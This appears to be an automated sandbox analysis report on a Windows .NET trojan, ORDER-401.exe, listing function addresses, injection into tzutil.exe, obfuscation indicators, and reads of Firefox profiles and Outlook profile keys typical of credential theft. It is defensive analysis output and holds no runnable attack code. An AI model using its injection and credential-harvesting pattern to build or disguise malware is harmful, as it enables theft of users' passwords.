                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_015570C0
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0153D34C
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0160132D
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0159739A
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0156B2C0
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_015F12ED
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_015552A0
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01607571
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_015ED5B0
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01541460
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0160F43F
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0160F7B0
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_016016CC
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01559950
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0156B950
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_015E5910
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_015BD800
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_015538E0
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0160FB76
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0158DBF9
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_015C5BF0
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0156FB80
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01607A46
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0160FA49
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_015C3A6C
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_015FDAC6
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_015EDAAC
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01595AA0
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_015F1AA3
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01607D73
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01553D40
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01601D5A
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0156FDC0
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_015C9C32
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0160FCF2
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0160FF09
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01513FD2
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01513FD5
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01551F92
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_0160FFB1
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: 4_2_01559EB0
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe | Code function: 7_2_04F20CD5
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe | Code function: 7_2_04F27460
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe | Code function: 7_2_04F27465
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe | Code function: 7_2_04F1EE45
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe | Code function: 7_2_04F1EE46
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe | Code function: 7_2_04F3F7B5
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe | Code function: 7_2_04F20AB5
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe | Code function: 7_2_04F20AAD
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe | Code function: 7_2_04F29248
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_0325A352
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_032603E6
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031AE3F0
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_03240274
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_032202C0
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_03190100
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_0323A118
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_03228158
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_032541A2
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_032601AA
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_032581CC
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_03232000
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031C4750
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: 8_2_031A0770
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0319C7C08_2_0319C7C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031BC6E08_2_031BC6E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031A05358_2_031A0535
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_032605918_2_03260591
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_032444208_2_03244420
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_032524468_2_03252446
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0324E4F68_2_0324E4F6
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0325AB408_2_0325AB40
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_03256BD78_2_03256BD7
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0319EA808_2_0319EA80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031B69628_2_031B6962
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0326A9A68_2_0326A9A6
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031A29A08_2_031A29A0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031A28408_2_031A2840
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031AA8408_2_031AA840
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031868B88_2_031868B8
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031CE8F08_2_031CE8F0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_03242F308_2_03242F30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031C0F308_2_031C0F30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031E2F288_2_031E2F28
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_03214F408_2_03214F40
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0321EFA08_2_0321EFA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031ACFE08_2_031ACFE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0325EE268_2_0325EE26
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031A0E598_2_031A0E59
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031B2E908_2_031B2E90
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0325CE938_2_0325CE93
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0325EEDB8_2_0325EEDB
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031AAD008_2_031AAD00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0323CD1F8_2_0323CD1F
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031B8DBF8_2_031B8DBF
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0319ADE08_2_0319ADE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031A0C008_2_031A0C00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_03240CB58_2_03240CB5
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_03190CF28_2_03190CF2
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0325132D8_2_0325132D
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0318D34C8_2_0318D34C
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031E739A8_2_031E739A
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031A52A08_2_031A52A0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_032412ED8_2_032412ED
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031BB2C08_2_031BB2C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0326B16B8_2_0326B16B
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0318F1728_2_0318F172
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031D516C8_2_031D516C
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031AB1B08_2_031AB1B0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0325F0E08_2_0325F0E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_032570E98_2_032570E9
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031A70C08_2_031A70C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0324F0CC8_2_0324F0CC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0325F7B08_2_0325F7B0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031E56308_2_031E5630
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_032516CC8_2_032516CC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_032575718_2_03257571
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0323D5B08_2_0323D5B0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_032695C38_2_032695C3
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0325F43F8_2_0325F43F
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031914608_2_03191460
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0325FB768_2_0325FB76
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031BFB808_2_031BFB80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_03215BF08_2_03215BF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031DDBF98_2_031DDBF9
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_03213A6C8_2_03213A6C
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_03257A468_2_03257A46
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0325FA498_2_0325FA49
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_03241AA38_2_03241AA3
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0323DAAC8_2_0323DAAC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031E5AA08_2_031E5AA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0324DAC68_2_0324DAC6
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_032359108_2_03235910
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031A99508_2_031A9950
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031BB9508_2_031BB950
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0320D8008_2_0320D800
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031A38E08_2_031A38E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0325FF098_2_0325FF09
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031A1F928_2_031A1F92
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0325FFB18_2_0325FFB1
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_03163FD58_2_03163FD5
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_03163FD28_2_03163FD2
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031A9EB08_2_031A9EB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_03257D738_2_03257D73
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031A3D408_2_031A3D40
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_03251D5A8_2_03251D5A
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031BFDC08_2_031BFDC0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_03219C328_2_03219C32
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0325FCF28_2_0325FCF2
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_028C21308_2_028C2130
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_028BB2908_2_028BB290
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_028BD2708_2_028BD270
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_028BB3E08_2_028BB3E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_028BD0488_2_028BD048
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_028BD0508_2_028BD050
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_028C57F08_2_028C57F0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_028C3A008_2_028C3A00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_028C39FB8_2_028C39FB
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_028DBD508_2_028DBD50
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02FDE4268_2_02FDE426
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02FDE5448_2_02FDE544
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02FDE8DC8_2_02FDE8DC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02FDD9A88_2_02FDD9A8
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02FDCC488_2_02FDCC48
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: String function: 01597E54 appears 101 times
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: String function: 015CF290 appears 105 times
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: String function: 015BEA12 appears 86 times
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: String function: 0153B970 appears 275 times
                Source: C:\Users\user\Desktop\ORDER-401.exe | Code function: String function: 01585130 appears 58 times
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: String function: 0318B970 appears 280 times
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: String function: 0321F290 appears 105 times
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: String function: 0320EA12 appears 86 times
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: String function: 031E7E54 appears 111 times
                Source: C:\Windows\SysWOW64\tzutil.exe | Code function: String function: 031D5130 appears 58 times
                Source: ORDER-401.exe, 00000000.00000002.1586921337.0000000005F70000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs ORDER-401.exe
                Source: ORDER-401.exe, 00000000.00000002.1587843187.0000000007240000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs ORDER-401.exe
                Source: ORDER-401.exe, 00000000.00000002.1571758996.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs ORDER-401.exe
                Source: ORDER-401.exe, 00000000.00000000.1394002348.00000000008C2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamexlzBH.exeL vs ORDER-401.exe
                Source: ORDER-401.exe, 00000000.00000002.1573736066.0000000002C58000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs ORDER-401.exe
                Source: ORDER-401.exe, 00000004.00000002.2097212523.000000000163D000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs ORDER-401.exe
                Source: ORDER-401.exe, 00000004.00000002.2096889491.0000000000F87000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenametzutil.exej% vs ORDER-401.exe
                Source: ORDER-401.exe, 00000004.00000002.2096889491.0000000000F68000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenametzutil.exej% vs ORDER-401.exe
                Source: ORDER-401.exe | Binary or memory string: OriginalFilenamexlzBH.exeL vs ORDER-401.exe
                Source: ORDER-401.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: ORDER-401.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, YRDVta5gJ5ilAYX9J5.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, YRDVta5gJ5ilAYX9J5.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, YRDVta5gJ5ilAYX9J5.cs | Security API names: _0020.AddAccessRule
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, YRDVta5gJ5ilAYX9J5.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, YRDVta5gJ5ilAYX9J5.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, YRDVta5gJ5ilAYX9J5.cs | Security API names: _0020.AddAccessRule
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, q7rgpHp9dHf1607YWr.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, q7rgpHp9dHf1607YWr.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/2@11/6
                Source: C:\Users\user\Desktop\ORDER-401.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ORDER-401.exe.log
                Source: C:\Users\user\Desktop\ORDER-401.exe | Mutant created: NULL
                Source: C:\Windows\SysWOW64\tzutil.exe | File created: C:\Users\user\AppData\Local\Temp\UQ63g7r-
                Source: ORDER-401.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\ORDER-401.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: tzutil.exe, 00000008.00000002.3255491198.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2287243226.0000000002BF6000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2287384131.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.3255491198.0000000002C43000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2289828066.0000000002C21000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: ORDER-401.exe | ReversingLabs: Detection: 68%
                Source: unknown | Process created: C:\Users\user\Desktop\ORDER-401.exe "C:\Users\user\Desktop\ORDER-401.exe"
                Source: C:\Users\user\Desktop\ORDER-401.exe | Process created: C:\Users\user\Desktop\ORDER-401.exe "C:\Users\user\Desktop\ORDER-401.exe"
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe | Process created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"
                Source: C:\Windows\SysWOW64\tzutil.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\ORDER-401.exe | Sections loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, uxtheme.dll, windowscodecs.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, dwrite.dll, iconcodecservice.dll
                Source: C:\Windows\SysWOW64\tzutil.exe | Sections loaded: wininet.dll, kernel.appcore.dll, uxtheme.dll, ieframe.dll, iertutil.dll, netapi32.dll, version.dll, userenv.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, secur32.dll, mlang.dll, propsys.dll, winsqlite3.dll, vaultcli.dll, wintypes.dll, dpapi.dll, cryptbase.dll
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe | Sections loaded: wininet.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, fwpuclnt.dll, rasadhlp.dll
                Source: C:\Users\user\Desktop\ORDER-401.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: C:\Users\user\Desktop\ORDER-401.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\tzutil.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: ORDER-401.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: ORDER-401.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: tzutil.pdbGCTL source: ORDER-401.exe, 00000004.00000002.2096889491.0000000000F68000.00000004.00000020.00020000.00000000.sdmp, PcwrDoOfOMD.exe, 00000007.00000002.3256736899.00000000013F8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: PcwrDoOfOMD.exe, 00000007.00000000.2018936585.0000000000D6E000.00000002.00000001.01000000.0000000C.sdmp, PcwrDoOfOMD.exe, 00000009.00000000.2167501370.0000000000D6E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: ORDER-401.exe, 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2096803511.0000000002E03000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2099649297.0000000002FB4000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: ORDER-401.exe, ORDER-401.exe, 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, tzutil.exe, 00000008.00000002.3258113218.0000000003160000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2096803511.0000000002E03000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2099649297.0000000002FB4000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.3258113218.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: tzutil.pdb source: ORDER-401.exe, 00000004.00000002.2096889491.0000000000F68000.00000004.00000020.00020000.00000000.sdmp, PcwrDoOfOMD.exe, 00000007.00000002.3256736899.00000000013F8000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, YRDVta5gJ5ilAYX9J5.cs | .Net Code: tjtwG0sMBJ System.Reflection.Assembly.Load(byte[])
                Source: 0.2.ORDER-401.exe.5f70000.3.raw.unpack, L2.cs | .Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, YRDVta5gJ5ilAYX9J5.cs | .Net Code: tjtwG0sMBJ System.Reflection.Assembly.Load(byte[])
                Source: ORDER-401.exe | Static PE information: section name: .text entropy: 7.789767866575687
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, s8O6f0hQrrm7LD37lO.cs High entropy of concatenated method names: 'c7Hb9CF4x5', 'yGwbSTNOdM', 'ToString', 'NLNb2BPsW9', 'WA9bUch4TR', 'HvDb8eOuoW', 'caObFCFSNB', 'lpdb0Fj9qK', 'YQTbg2RJNH', 'blPb5cJ6VC'
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, OghYC8AsMXf86gZ4Lr.cs High entropy of concatenated method names: 'AHeLYgUHXr', 'WvrLKkOxEU', 'paqLlmAsNZ', 'JqfLWqARXi', 'TQ4LPv0IJe', 'VwOLVmDKiG', 'AbiLDdy0ns', 'pPSLXbjgvE', 'kEHL49rEYE', 'VIdLeKahSm'
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, aQtnXxRRhYtMLdqBg5n.cs High entropy of concatenated method names: 'k3eIcHWvwm', 'n5DIzVcQ2P', 'fNwJTDo1D2', 'wsaJRU8TsY', 'qQxJHulMru', 'pT3JaSWiZj', 'cL5Jww4ZR6', 'YaTJxWDc8c', 'dflJ2EFTNn', 'NiFJURH7n6'
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, tO9lakD4N1gSofW9N9.cs High entropy of concatenated method names: 'w8Sg2l7cMi', 'Q7wg8loK6T', 'OHYg06p9ZU', 'NFF0c1FgSn', 'OiO0zWR5nI', 'cOwgTVejnr', 'mMIgRhZ4Yp', 'abwgHA8SAc', 'PwFgaIUIXF', 'XkMgwd8CEO'
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, l96jCkWo0Qgw1Rruei.cs High entropy of concatenated method names: 'WgB0vJP6Dp', 'syP0uMabZ8', 'vtu0GSiosL', 'J9B0BKc0ER', 'IHk0Qayysw', 'FH10kTQ63K', 'PBu0E3iG8l', 'JIn06xXedO', 'TgKh2cmc8fXVVOKrC89', 'NkdDeKmS8SG77R5sHfJ'
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, Dyt4SaHyhgDsWX8b9b.cs High entropy of concatenated method names: 'rl8GWtGrd', 'sroBggEpj', 'DjyQRJhfu', 'AvZkiomUQ', 'xbPEWbkTS', 'm4W6EXRHW', 'AXhiqe9rmG3vPt5X1I', 'jiZNo2XpVg8eaZDePP', 'L3hx3nPGvBET6qjb8r', 'w9HoBiDWi'
